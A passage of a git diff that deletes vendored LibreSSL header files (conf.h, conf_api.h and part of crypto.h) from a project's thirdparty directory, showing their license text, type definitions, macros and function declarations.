- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef  HEADER_CONF_H
-#define HEADER_CONF_H
-
-#include <openssl/opensslconf.h>
-
-#include <openssl/bio.h>
-#include <openssl/lhash.h>
-#include <openssl/stack.h>
-#include <openssl/safestack.h>
-
-#include <openssl/ossl_typ.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-typedef struct {
-	char *section;
-	char *name;
-	char *value;
-} CONF_VALUE;
-
-DECLARE_STACK_OF(CONF_VALUE)
-DECLARE_LHASH_OF(CONF_VALUE);
-
-struct conf_st;
-struct conf_method_st;
-typedef struct conf_method_st CONF_METHOD;
-
-struct conf_method_st {
-	const char *name;
-	CONF *(*create)(CONF_METHOD *meth);
-	int (*init)(CONF *conf);
-	int (*destroy)(CONF *conf);
-	int (*destroy_data)(CONF *conf);
-	int (*load_bio)(CONF *conf, BIO *bp, long *eline);
-	int (*dump)(const CONF *conf, BIO *bp);
-	int (*is_number)(const CONF *conf, char c);
-	int (*to_int)(const CONF *conf, char c);
-	int (*load)(CONF *conf, const char *name, long *eline);
-};
-
-/* Module definitions */
-
-typedef struct conf_imodule_st CONF_IMODULE;
-typedef struct conf_module_st CONF_MODULE;
-
-DECLARE_STACK_OF(CONF_MODULE)
-DECLARE_STACK_OF(CONF_IMODULE)
-
-/* DSO module function typedefs */
-typedef int conf_init_func(CONF_IMODULE *md, const CONF *cnf);
-typedef void conf_finish_func(CONF_IMODULE *md);
-
-#define	CONF_MFLAGS_IGNORE_ERRORS	0x1
-#define CONF_MFLAGS_IGNORE_RETURN_CODES	0x2
-#define CONF_MFLAGS_SILENT		0x4
-#define CONF_MFLAGS_NO_DSO		0x8
-#define CONF_MFLAGS_IGNORE_MISSING_FILE	0x10
-#define CONF_MFLAGS_DEFAULT_SECTION	0x20
-
-int CONF_set_default_method(CONF_METHOD *meth);
-void CONF_set_nconf(CONF *conf, LHASH_OF(CONF_VALUE) *hash);
-LHASH_OF(CONF_VALUE) *CONF_load(LHASH_OF(CONF_VALUE) *conf, const char *file,
-    long *eline);
-LHASH_OF(CONF_VALUE) *CONF_load_fp(LHASH_OF(CONF_VALUE) *conf, FILE *fp,
-    long *eline);
-LHASH_OF(CONF_VALUE) *CONF_load_bio(LHASH_OF(CONF_VALUE) *conf, BIO *bp, long *eline);
-STACK_OF(CONF_VALUE) *CONF_get_section(LHASH_OF(CONF_VALUE) *conf,
-    const char *section);
-char *CONF_get_string(LHASH_OF(CONF_VALUE) *conf, const char *group,
-    const char *name);
-long CONF_get_number(LHASH_OF(CONF_VALUE) *conf, const char *group,
-    const char *name);
-void CONF_free(LHASH_OF(CONF_VALUE) *conf);
-int CONF_dump_fp(LHASH_OF(CONF_VALUE) *conf, FILE *out);
-int CONF_dump_bio(LHASH_OF(CONF_VALUE) *conf, BIO *out);
-
-void OPENSSL_config(const char *config_name);
-void OPENSSL_no_config(void);
-
-/* New conf code.  The semantics are different from the functions above.
-   If that wasn't the case, the above functions would have been replaced */
-
-struct conf_st {
-	CONF_METHOD *meth;
-	void *meth_data;
-	LHASH_OF(CONF_VALUE) *data;
-};
-
-CONF *NCONF_new(CONF_METHOD *meth);
-CONF_METHOD *NCONF_default(void);
-CONF_METHOD *NCONF_WIN32(void);
-void NCONF_free(CONF *conf);
-void NCONF_free_data(CONF *conf);
-
-int NCONF_load(CONF *conf, const char *file, long *eline);
-int NCONF_load_fp(CONF *conf, FILE *fp, long *eline);
-int NCONF_load_bio(CONF *conf, BIO *bp, long *eline);
-STACK_OF(CONF_VALUE) *NCONF_get_section(const CONF *conf, const char *section);
-char *NCONF_get_string(const CONF *conf, const char *group, const char *name);
-int NCONF_get_number_e(const CONF *conf, const char *group, const char *name,
-    long *result);
-int NCONF_dump_fp(const CONF *conf, FILE *out);
-int NCONF_dump_bio(const CONF *conf, BIO *out);
-
-#define NCONF_get_number(c,g,n,r) NCONF_get_number_e(c,g,n,r)
-
-/* Module functions */
-
-int CONF_modules_load(const CONF *cnf, const char *appname,
-    unsigned long flags);
-int CONF_modules_load_file(const char *filename, const char *appname,
-    unsigned long flags);
-void CONF_modules_unload(int all);
-void CONF_modules_finish(void);
-void CONF_modules_free(void);
-int CONF_module_add(const char *name, conf_init_func *ifunc,
-    conf_finish_func *ffunc);
-
-const char *CONF_imodule_get_name(const CONF_IMODULE *md);
-const char *CONF_imodule_get_value(const CONF_IMODULE *md);
-void *CONF_imodule_get_usr_data(const CONF_IMODULE *md);
-void CONF_imodule_set_usr_data(CONF_IMODULE *md, void *usr_data);
-CONF_MODULE *CONF_imodule_get_module(const CONF_IMODULE *md);
-unsigned long CONF_imodule_get_flags(const CONF_IMODULE *md);
-void CONF_imodule_set_flags(CONF_IMODULE *md, unsigned long flags);
-void *CONF_module_get_usr_data(CONF_MODULE *pmod);
-void CONF_module_set_usr_data(CONF_MODULE *pmod, void *usr_data);
-
-char *CONF_get1_default_config_file(void);
-
-int CONF_parse_list(const char *list, int sep, int nospc,
-    int (*list_cb)(const char *elem, int len, void *usr), void *arg);
-
-void OPENSSL_load_builtin_modules(void);
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_CONF_strings(void);
-
-/* Error codes for the CONF functions. */
-
-/* Function codes. */
-#define CONF_F_CONF_DUMP_FP				 104
-#define CONF_F_CONF_LOAD				 100
-#define CONF_F_CONF_LOAD_BIO				 102
-#define CONF_F_CONF_LOAD_FP				 103
-#define CONF_F_CONF_MODULES_LOAD			 116
-#define CONF_F_CONF_PARSE_LIST				 119
-#define CONF_F_DEF_LOAD					 120
-#define CONF_F_DEF_LOAD_BIO				 121
-#define CONF_F_MODULE_INIT				 115
-#define CONF_F_MODULE_LOAD_DSO				 117
-#define CONF_F_MODULE_RUN				 118
-#define CONF_F_NCONF_DUMP_BIO				 105
-#define CONF_F_NCONF_DUMP_FP				 106
-#define CONF_F_NCONF_GET_NUMBER				 107
-#define CONF_F_NCONF_GET_NUMBER_E			 112
-#define CONF_F_NCONF_GET_SECTION			 108
-#define CONF_F_NCONF_GET_STRING				 109
-#define CONF_F_NCONF_LOAD				 113
-#define CONF_F_NCONF_LOAD_BIO				 110
-#define CONF_F_NCONF_LOAD_FP				 114
-#define CONF_F_NCONF_NEW				 111
-#define CONF_F_STR_COPY					 101
-
-/* Reason codes. */
-#define CONF_R_ERROR_LOADING_DSO			 110
-#define CONF_R_LIST_CANNOT_BE_NULL			 115
-#define CONF_R_MISSING_CLOSE_SQUARE_BRACKET		 100
-#define CONF_R_MISSING_EQUAL_SIGN			 101
-#define CONF_R_MISSING_FINISH_FUNCTION			 111
-#define CONF_R_MISSING_INIT_FUNCTION			 112
-#define CONF_R_MODULE_INITIALIZATION_ERROR		 109
-#define CONF_R_NO_CLOSE_BRACE				 102
-#define CONF_R_NO_CONF					 105
-#define CONF_R_NO_CONF_OR_ENVIRONMENT_VARIABLE		 106
-#define CONF_R_NO_SECTION				 107
-#define CONF_R_NO_SUCH_FILE				 114
-#define CONF_R_NO_VALUE					 108
-#define CONF_R_UNABLE_TO_CREATE_NEW_SECTION		 103
-#define CONF_R_UNKNOWN_MODULE_NAME			 113
-#define CONF_R_VARIABLE_HAS_NO_VALUE			 104
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/conf_api.h b/thirdparty/libressl/include/openssl/conf_api.h
deleted file mode 100644
index 95f9386..0000000
--- a/thirdparty/libressl/include/openssl/conf_api.h
+++ /dev/null
@@ -1,88 +0,0 @@
-/* $OpenBSD: conf_api.h,v 1.4 2014/06/12 15:49:28 deraadt Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef  HEADER_CONF_API_H
-#define HEADER_CONF_API_H
-
-#include <openssl/lhash.h>
-#include <openssl/conf.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-/* Up until OpenSSL 0.9.5a, this was new_section */
-CONF_VALUE *_CONF_new_section(CONF *conf, const char *section);
-/* Up until OpenSSL 0.9.5a, this was get_section */
-CONF_VALUE *_CONF_get_section(const CONF *conf, const char *section);
-/* Up until OpenSSL 0.9.5a, this was CONF_get_section */
-STACK_OF(CONF_VALUE) *_CONF_get_section_values(const CONF *conf,
-    const char *section);
-
-int _CONF_add_string(CONF *conf, CONF_VALUE *section, CONF_VALUE *value);
-char *_CONF_get_string(const CONF *conf, const char *section,
-    const char *name);
-long _CONF_get_number(const CONF *conf, const char *section, const char *name);
-
-int _CONF_new_data(CONF *conf);
-void _CONF_free_data(CONF *conf);
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/crypto.h b/thirdparty/libressl/include/openssl/crypto.h
deleted file mode 100644
index 068415f..0000000
--- a/thirdparty/libressl/include/openssl/crypto.h
+++ /dev/null
@@ -1,540 +0,0 @@
-/* $OpenBSD: crypto.h,v 1.41 2017/04/29 21:48:43 jsing Exp $ */
-/* ====================================================================
- * Copyright (c) 1998-2006 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    openssl-core@openssl.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-/* ====================================================================
- * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
- * ECDH support in OpenSSL originally developed by
- * SUN MICROSYSTEMS, INC., and contributed to the OpenSSL project.
- */
-
-#include <stdint.h>
-#include <stdio.h>
-#include <stdlib.h>
-
-#ifndef HEADER_CRYPTO_H
-#define HEADER_CRYPTO_H
-
-#include <openssl/opensslconf.h>
-
-#include <openssl/stack.h>
-#include <openssl/safestack.h>
-#include <openssl/opensslv.h>
-#include <openssl/ossl_typ.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-/* Backward compatibility to SSLeay */
-/* This is more to be used to check the correct DLL is being used
- * in the MS world. */
-#define SSLEAY_VERSION_NUMBER	OPENSSL_VERSION_NUMBER
-#define SSLEAY_VERSION		0
-/* #define SSLEAY_OPTIONS	1 no longer supported */
-#define SSLEAY_CFLAGS		2
-#define SSLEAY_BUILT_ON		3
-#define SSLEAY_PLATFORM		4
-#define SSLEAY_DIR		5
-
-/* A generic structure to pass assorted data in a expandable way */
-typedef struct openssl_item_st {
-	int code;
-	void *value;		/* Not used for flag attributes */
-	size_t value_size;	/* Max size of value for output, length for input */
-	size_t *value_length;	/* Returned length of value for output */
-} OPENSSL_ITEM;
-
-
-/* When changing the CRYPTO_LOCK_* list, be sure to maintain the text lock
- * names in cryptlib.c
- */
-
-#define	CRYPTO_LOCK_ERR			1
-#define	CRYPTO_LOCK_EX_DATA		2
-#define	CRYPTO_LOCK_X509		3
-#define	CRYPTO_LOCK_X509_INFO		4
-#define	CRYPTO_LOCK_X509_PKEY		5
-#define CRYPTO_LOCK_X509_CRL		6
-#define CRYPTO_LOCK_X509_REQ		7
-#define CRYPTO_LOCK_DSA			8
-#define CRYPTO_LOCK_RSA			9
-#define CRYPTO_LOCK_EVP_PKEY		10
-#define CRYPTO_LOCK_X509_STORE		11
-#define CRYPTO_LOCK_SSL_CTX		12
-#define CRYPTO_LOCK_SSL_CERT		13
-#define CRYPTO_LOCK_SSL_SESSION		14
-#define CRYPTO_LOCK_SSL_SESS_CERT	15
-#define CRYPTO_LOCK_SSL			16
-#define CRYPTO_LOCK_SSL_METHOD		17
-#define CRYPTO_LOCK_RAND		18
-#define CRYPTO_LOCK_RAND2		19
-#define CRYPTO_LOCK_MALLOC		20
-#define CRYPTO_LOCK_BIO			21
-#define CRYPTO_LOCK_GETHOSTBYNAME	22
-#define CRYPTO_LOCK_GETSERVBYNAME	23
-#define CRYPTO_LOCK_READDIR		24
-#define CRYPTO_LOCK_RSA_BLINDING	25
-#define CRYPTO_LOCK_DH			26
-#define CRYPTO_LOCK_MALLOC2		27
-#define CRYPTO_LOCK_DSO			28
-#define CRYPTO_LOCK_DYNLOCK		29
-#define CRYPTO_LOCK_ENGINE		30
-#define CRYPTO_LOCK_UI			31
-#define CRYPTO_LOCK_ECDSA               32
-#define CRYPTO_LOCK_EC			33
-#define CRYPTO_LOCK_ECDH		34
-#define CRYPTO_LOCK_BN  		35
-#define CRYPTO_LOCK_EC_PRE_COMP		36
-#define CRYPTO_LOCK_STORE		37
-#define CRYPTO_LOCK_COMP		38
-#define CRYPTO_LOCK_FIPS		39
-#define CRYPTO_LOCK_FIPS2		40
-#define CRYPTO_NUM_LOCKS		41
-
-#define CRYPTO_LOCK		1
-#define CRYPTO_UNLOCK		2
-#define CRYPTO_READ		4
-#define CRYPTO_WRITE		8
-
-#ifndef OPENSSL_NO_LOCKING
-#ifndef CRYPTO_w_lock
-#define CRYPTO_w_lock(type)	\
-	CRYPTO_lock(CRYPTO_LOCK|CRYPTO_WRITE,type,__FILE__,__LINE__)
-#define CRYPTO_w_unlock(type)	\
-	CRYPTO_lock(CRYPTO_UNLOCK|CRYPTO_WRITE,type,__FILE__,__LINE__)
-#define CRYPTO_r_lock(type)	\
-	CRYPTO_lock(CRYPTO_LOCK|CRYPTO_READ,type,__FILE__,__LINE__)
-#define CRYPTO_r_unlock(type)	\
-	CRYPTO_lock(CRYPTO_UNLOCK|CRYPTO_READ,type,__FILE__,__LINE__)
-#define CRYPTO_add(addr,amount,type)	\
-	CRYPTO_add_lock(addr,amount,type,__FILE__,__LINE__)
-#endif
-#else
-#define CRYPTO_w_lock(a)
-#define CRYPTO_w_unlock(a)
-#define CRYPTO_r_lock(a)
-#define CRYPTO_r_unlock(a)
-#define CRYPTO_add(a,b,c)	((*(a))+=(b))
-#endif
-
-/* Some applications as well as some parts of OpenSSL need to allocate
-   and deallocate locks in a dynamic fashion.  The following typedef
-   makes this possible in a type-safe manner.  */
-/* struct CRYPTO_dynlock_value has to be defined by the application. */
-typedef struct {
-	int references;
-	struct CRYPTO_dynlock_value *data;
-} CRYPTO_dynlock;
-
-
-/* The following can be used to detect memory leaks in the SSLeay library.
- * It used, it turns on malloc checking */
-
-#define CRYPTO_MEM_CHECK_OFF	0x0	/* an enume */
-#define CRYPTO_MEM_CHECK_ON	0x1	/* a bit */
-#define CRYPTO_MEM_CHECK_ENABLE	0x2	/* a bit */
-#define CRYPTO_MEM_CHECK_DISABLE 0x3	/* an enume */
-
-/* The following are bit values to turn on or off options connected to the
- * malloc checking functionality */
-
-/* Adds time to the memory checking information */
-#define V_CRYPTO_MDEBUG_TIME	0x1 /* a bit */
-/* Adds thread number to the memory checking information */
-#define V_CRYPTO_MDEBUG_THREAD	0x2 /* a bit */
-
-#define V_CRYPTO_MDEBUG_ALL (V_CRYPTO_MDEBUG_TIME | V_CRYPTO_MDEBUG_THREAD)
-
-
-/* predec of the BIO type */
-typedef struct bio_st BIO_dummy;
-
-struct crypto_ex_data_st {
-	STACK_OF(void) *sk;
-};
-DECLARE_STACK_OF(void)
-
-/* This stuff is basically class callback functions
- * The current classes are SSL_CTX, SSL, SSL_SESSION, and a few more */
-
-typedef struct crypto_ex_data_func_st {
-	long argl;	/* Arbitary long */
-	void *argp;	/* Arbitary void * */
-	CRYPTO_EX_new *new_func;
-	CRYPTO_EX_free *free_func;
-	CRYPTO_EX_dup *dup_func;
-} CRYPTO_EX_DATA_FUNCS;
-
-DECLARE_STACK_OF(CRYPTO_EX_DATA_FUNCS)
-
-/* Per class, we have a STACK of CRYPTO_EX_DATA_FUNCS for each CRYPTO_EX_DATA
- * entry.
- */
-
-#define CRYPTO_EX_INDEX_BIO		0
-#define CRYPTO_EX_INDEX_SSL		1
-#define CRYPTO_EX_INDEX_SSL_CTX		2
-#define CRYPTO_EX_INDEX_SSL_SESSION	3
-#define CRYPTO_EX_INDEX_X509_STORE	4
-#define CRYPTO_EX_INDEX_X509_STORE_CTX	5
-#define CRYPTO_EX_INDEX_RSA		6
-#define CRYPTO_EX_INDEX_DSA		7
-#define CRYPTO_EX_INDEX_DH		8
-#define CRYPTO_EX_INDEX_ENGINE		9
-#define CRYPTO_EX_INDEX_X509		10
-#define CRYPTO_EX_INDEX_UI		11
-#define CRYPTO_EX_INDEX_ECDSA		12
-#define CRYPTO_EX_INDEX_ECDH		13
-#define CRYPTO_EX_INDEX_COMP		14
-#define CRYPTO_EX_INDEX_STORE		15
-
-/* Dynamically assigned indexes start from this value (don't use directly, use
- * via CRYPTO_ex_data_new_class). */
-#define CRYPTO_EX_INDEX_USER		100
-
-#define CRYPTO_malloc_init()		(0)
-#define CRYPTO_malloc_debug_init()	(0)
-
-#if defined CRYPTO_MDEBUG_ALL || defined CRYPTO_MDEBUG_TIME || defined CRYPTO_MDEBUG_THREAD
-# ifndef CRYPTO_MDEBUG /* avoid duplicate #define */
-#  define CRYPTO_MDEBUG
-# endif
-#endif
-
-int CRYPTO_mem_ctrl(int mode);
-int CRYPTO_is_mem_check_on(void);
-
-/* for applications */
-#define MemCheck_start() CRYPTO_mem_ctrl(CRYPTO_MEM_CHECK_ON)
-#define MemCheck_stop()	CRYPTO_mem_ctrl(CRYPTO_MEM_CHECK_OFF)
-
-#define OPENSSL_malloc(num)	CRYPTO_malloc((int)num,__FILE__,__LINE__)
-#define OPENSSL_strdup(str)	CRYPTO_strdup((str),__FILE__,__LINE__)
-#define OPENSSL_realloc(addr,num) \
-	CRYPTO_realloc((char *)addr,(int)num,__FILE__,__LINE__)
-#define OPENSSL_realloc_clean(addr,old_num,num) \
-	CRYPTO_realloc_clean(addr,old_num,num,__FILE__,__LINE__)
-#define OPENSSL_remalloc(addr,num) \
-	CRYPTO_remalloc((char **)addr,(int)num,__FILE__,__LINE__)
-#define OPENSSL_freeFunc	CRYPTO_free
-#define OPENSSL_free(addr)	CRYPTO_free(addr)
-
-#define OPENSSL_malloc_locked(num) \
-	CRYPTO_malloc_locked((int)num,__FILE__,__LINE__)
-#define OPENSSL_free_locked(addr) CRYPTO_free_locked(addr)
-
-
-const char *SSLeay_version(int type);
-unsigned long SSLeay(void);
-
-/* An opaque type representing an implementation of "ex_data" support */
-typedef struct st_CRYPTO_EX_DATA_IMPL	CRYPTO_EX_DATA_IMPL;
-/* Return an opaque pointer to the current "ex_data" implementation */
-const CRYPTO_EX_DATA_IMPL *CRYPTO_get_ex_data_implementation(void);
-/* Sets the "ex_data" implementation to be used (if it's not too late) */
-int CRYPTO_set_ex_data_implementation(const CRYPTO_EX_DATA_IMPL *i);
-/* Get a new "ex_data" class, and return the corresponding "class_index" */
-int CRYPTO_ex_data_new_class(void);
-/* Within a given class, get/register a new index */
-int CRYPTO_get_ex_new_index(int class_index, long argl, void *argp,
-    CRYPTO_EX_new *new_func, CRYPTO_EX_dup *dup_func,
-    CRYPTO_EX_free *free_func);
-/* Initialise/duplicate/free CRYPTO_EX_DATA variables corresponding to a given
- * class (invokes whatever per-class callbacks are applicable) */
-int CRYPTO_new_ex_data(int class_index, void *obj, CRYPTO_EX_DATA *ad);
-int CRYPTO_dup_ex_data(int class_index, CRYPTO_EX_DATA *to,
-    CRYPTO_EX_DATA *from);
-void CRYPTO_free_ex_data(int class_index, void *obj, CRYPTO_EX_DATA *ad);
-/* Get/set data in a CRYPTO_EX_DATA variable corresponding to a particular index
- * (relative to the class type involved) */
-int CRYPTO_set_ex_data(CRYPTO_EX_DATA *ad, int idx, void *val);
-void *CRYPTO_get_ex_data(const CRYPTO_EX_DATA *ad, int idx);
-/* This function cleans up all "ex_data" state. It mustn't be called under
- * potential race-conditions. */
-void CRYPTO_cleanup_all_ex_data(void);
-
-int CRYPTO_get_new_lockid(char *name);
-
-int CRYPTO_num_locks(void); /* return CRYPTO_NUM_LOCKS (shared libs!) */
-void CRYPTO_lock(int mode, int type, const char *file, int line);
-void CRYPTO_set_locking_callback(void (*func)(int mode, int type,
-    const char *file, int line));
-void (*CRYPTO_get_locking_callback(void))(int mode, int type,
-    const char *file, int line);
-void CRYPTO_set_add_lock_callback(int (*func)(int *num, int mount, int type,
-    const char *file, int line));
-int (*CRYPTO_get_add_lock_callback(void))(int *num, int mount, int type,
-    const char *file, int line);
-
-/* Don't use this structure directly. */
-typedef struct crypto_threadid_st {
-	void *ptr;
-	unsigned long val;
-} CRYPTO_THREADID;
-/* Only use CRYPTO_THREADID_set_[numeric|pointer]() within callbacks */
-void CRYPTO_THREADID_set_numeric(CRYPTO_THREADID *id, unsigned long val);
-void CRYPTO_THREADID_set_pointer(CRYPTO_THREADID *id, void *ptr);
-int CRYPTO_THREADID_set_callback(void (*threadid_func)(CRYPTO_THREADID *));
-void (*CRYPTO_THREADID_get_callback(void))(CRYPTO_THREADID *);
-void CRYPTO_THREADID_current(CRYPTO_THREADID *id);
-int CRYPTO_THREADID_cmp(const CRYPTO_THREADID *a, const CRYPTO_THREADID *b);
-void CRYPTO_THREADID_cpy(CRYPTO_THREADID *dest, const CRYPTO_THREADID *src);
-unsigned long CRYPTO_THREADID_hash(const CRYPTO_THREADID *id);
-#ifndef OPENSSL_NO_DEPRECATED
-void CRYPTO_set_id_callback(unsigned long (*func)(void));
-unsigned long (*CRYPTO_get_id_callback(void))(void);
-unsigned long CRYPTO_thread_id(void);
-#endif
-
-const char *CRYPTO_get_lock_name(int type);
-int CRYPTO_add_lock(int *pointer, int amount, int type, const char *file,
-    int line);
-
-int CRYPTO_get_new_dynlockid(void);
-void CRYPTO_destroy_dynlockid(int i);
-struct CRYPTO_dynlock_value *CRYPTO_get_dynlock_value(int i);
-void CRYPTO_set_dynlock_create_callback(struct CRYPTO_dynlock_value *(*dyn_create_function)(const char *file, int line));
-void CRYPTO_set_dynlock_lock_callback(void (*dyn_lock_function)(int mode, struct CRYPTO_dynlock_value *l, const char *file, int line));
-void CRYPTO_set_dynlock_destroy_callback(void (*dyn_destroy_function)(struct CRYPTO_dynlock_value *l, const char *file, int line));
